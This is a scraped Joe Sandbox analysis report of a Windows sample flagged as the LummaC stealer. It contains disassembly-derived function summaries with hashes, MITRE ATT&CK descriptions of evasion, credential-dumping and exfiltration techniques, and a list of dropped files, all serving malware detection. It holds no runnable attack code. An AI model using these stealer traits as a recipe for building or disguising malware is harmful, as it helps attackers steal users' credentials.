Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: sd
API String ID: 257928180-2868648936
Opcode ID: 6f40183ef48025b899d9ac3ecbc0a650b1e702c0238d6b0461e9fbec33d45fb2
Instruction ID: 472401d041e4c4ee95a8782f113d4e986197806a8548e2301a8f55c7b996c686
Opcode Fuzzy Hash: 6f40183ef48025b899d9ac3ecbc0a650b1e702c0238d6b0461e9fbec33d45fb2
Instruction Fuzzy Hash: 97118E3190421A9A8F01FFA4984AECE7FADFF49350B0044A9BD45EB250EF709B84AB51

Function 005E934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E9367
__fread_nolock.LIBCMT ref: 005E937C

Strings

EA06, xrefs: 005E93AE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 8c90cceea8badb4dd852e2db6c5b7410f9c2cace23cbd02ed052e070a7ea5fab
Instruction ID: b64fc0538840a51b66ba7b67ecdb6de6e2c0a7be2fccba33bf1cf17364837979
Opcode Fuzzy Hash: 8c90cceea8badb4dd852e2db6c5b7410f9c2cace23cbd02ed052e070a7ea5fab
Instruction Fuzzy Hash: 3B01F9728042587EDB28C7A8C85AEFE7FF8EB06301F00459AF592D2181E578A6048760

Function 005D98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 005DB79A: GetClassNameW.USER32(?,?,000000FF), ref: 005DB7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 005D9923

Strings

ListBox, xrefs: 005D98ED
ComboBox, xrefs: 005D98C2

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 29a559b93c79474408f047b5e05c043a8e30bba4999f14b5895ce08d73c9d5d2
Instruction ID: 02f63c4476a216ec6e9712d42a8d9f5b867287d93cd1063e3f0ed22963c89fd9
Opcode Fuzzy Hash: 29a559b93c79474408f047b5e05c043a8e30bba4999f14b5895ce08d73c9d5d2
Instruction Fuzzy Hash: 1501D871A41116ABCF24EBA4C966EFE7BADEF51300F50011BB84163281DA105E0896F1

Function 005D993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 005DB79A: GetClassNameW.USER32(?,?,000000FF), ref: 005DB7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 005D99A6

Strings

ListBox, xrefs: 005D9972
ComboBox, xrefs: 005D9947

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 533e9388f1e09da76c830b30b55049fa4afc6162dc6c9faa05c225708052780f
Instruction ID: 30c39179e0a55d06f16916b033601eb0440a349999e1d2e6901e2a1f4cd25b20
Opcode Fuzzy Hash: 533e9388f1e09da76c830b30b55049fa4afc6162dc6c9faa05c225708052780f
Instruction Fuzzy Hash: 19012B72E4111AABCF24EBA8CA56EFF7BADFF51340F50001BB84163381DA108F0896B1

Function 005A6D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 005A6DC0
__calloc_crt.LIBCMT ref: 005A6DD9

Strings

@bd, xrefs: 005A6DF0

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __calloc_crt
String ID: @bd
API String ID: 3494438863-2463103158
Opcode ID: 3797d702d656ef751d44be8384980f4566c1b3b307719ebee9afb57804bbadb0
Instruction ID: febff39d2309995351a849bb44ab58dff1b355b48d65823cb3cba89e727ddeb7
Opcode Fuzzy Hash: 3797d702d656ef751d44be8384980f4566c1b3b307719ebee9afb57804bbadb0
Instruction Fuzzy Hash: 56F0627530C6138FF7348F18BD017AA2FA6F7537A4F18286AF200DA295E7B0C98156C0

Function 005E54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 005E5501
_wcscmp.LIBCMT ref: 005E5513

Strings

#32770, xrefs: 005E550D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: febd6240b7fb1f4d0cc68447bf5133976d382e686196662a6d353a0906a0bcfa
Instruction ID: d06f017bfb87b84bd03230d8554506b84176415b8a3bfef782cd85038a9b19b6
Opcode Fuzzy Hash: febd6240b7fb1f4d0cc68447bf5133976d382e686196662a6d353a0906a0bcfa
Instruction Fuzzy Hash: 30E061365002292BD7109A59AC09FABFFACEB45730F001017FD04D3051E5609A4087D0

Function 005D8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005D88A0

Part of subcall function 005A3588: _doexit.LIBCMT ref: 005A3592

Strings

AutoIt, xrefs: 005D8894
Error allocating memory., xrefs: 005D8899

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 7326c8129161ee246d5aa411c9a7a5df09013e00efcce2749de98d9a38c46f53
Instruction ID: e980e5c87a0242218cb38ccaf96e8fe772b48ecda4e50e9d77d2692bf8b4c403
Opcode Fuzzy Hash: 7326c8129161ee246d5aa411c9a7a5df09013e00efcce2749de98d9a38c46f53
Instruction Fuzzy Hash: 1CD02B3138031832D32432E86C0FFCE3F499B45B50F048427FB08A51C389D289D052D5

Function 005BB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 005BB544: _memset.LIBCMT ref: 005BB551

Part of subcall function 005A0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005BB520,?,?,?,0058100A), ref: 005A0B79

IsDebuggerPresent.KERNEL32(?,?,?,0058100A), ref: 005BB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0058100A), ref: 005BB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005BB52E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 0b29e183f7efabe7f11672dce80f648677f6a10496133e3ceaeb1593e866c771
Instruction ID: b0dfea8a34adbfc6d9138fff3150bbc2d216610bbc1ba934d66cc9c638d9df91
Opcode Fuzzy Hash: 0b29e183f7efabe7f11672dce80f648677f6a10496133e3ceaeb1593e866c771
Instruction Fuzzy Hash: 10E06D702007228FE730AF35E408786BEE0BF04304F14991EE856C2380EBF4E644CBA2

Function 005C0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 005C0091

Part of subcall function 005FC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,005C027A,?), ref: 005FC6E7
Part of subcall function 005FC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005FC6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005C0289

Strings

WIN_XPe, xrefs: 005C00A4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: d212b71fca21082a1fc712567643e7efdf1a770cb9c34aae4a516c44ca036e57
Instruction ID: f75f26168ca54abec52f26a5437523fef291b5b95e7296a0685533f1656f0876
Opcode Fuzzy Hash: d212b71fca21082a1fc712567643e7efdf1a770cb9c34aae4a516c44ca036e57
Instruction Fuzzy Hash: 50F01570805109DFDF15DBA0C988BECBFB8BB48301F642489E106B20A0CBB44F80DF20

Function 00595800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,zd0zd,00647A2C,00647890,?,00595A53,00647A2C,00647A30,?,00000004), ref: 00595823

Strings

,zd0zd, xrefs: 00595808, 00595821
SZY,zd0zd, xrefs: 00595804

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: DestroyIcon
String ID: ,zd0zd$SZY,zd0zd
API String ID: 1234817797-845362369
Opcode ID: 7e80daa9c066052a93d4292e6263c90c18a353521aa13d21b6904a5d089bca2a
Instruction ID: fb7d7bf077c48342abe6397bf3994b2130d2ae4709350a3b18d22671b76e813b
Opcode Fuzzy Hash: 7e80daa9c066052a93d4292e6263c90c18a353521aa13d21b6904a5d089bca2a
Instruction Fuzzy Hash: C6E0123242824AEBEF225F49D804795FFE9BF65321F748416E48456151E3B568F0CB94

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Okfjk1hs4kdhs2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\756341\Place.pif

C:\Users\user\AppData\Local\Temp\756341\V

C:\Users\user\AppData\Local\Temp\Abuse

C:\Users\user\AppData\Local\Temp\Belly

C:\Users\user\AppData\Local\Temp\Belly.bat

C:\Users\user\AppData\Local\Temp\Bow

C:\Users\user\AppData\Local\Temp\Hit

C:\Users\user\AppData\Local\Temp\Intimate

C:\Users\user\AppData\Local\Temp\Olympics

C:\Users\user\AppData\Local\Temp\Relevance

C:\Users\user\AppData\Local\Temp\Significant

C:\Users\user\AppData\Local\Temp\Suzuki

Windows Analysis Report
Okfjk1hs4kdhs2.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
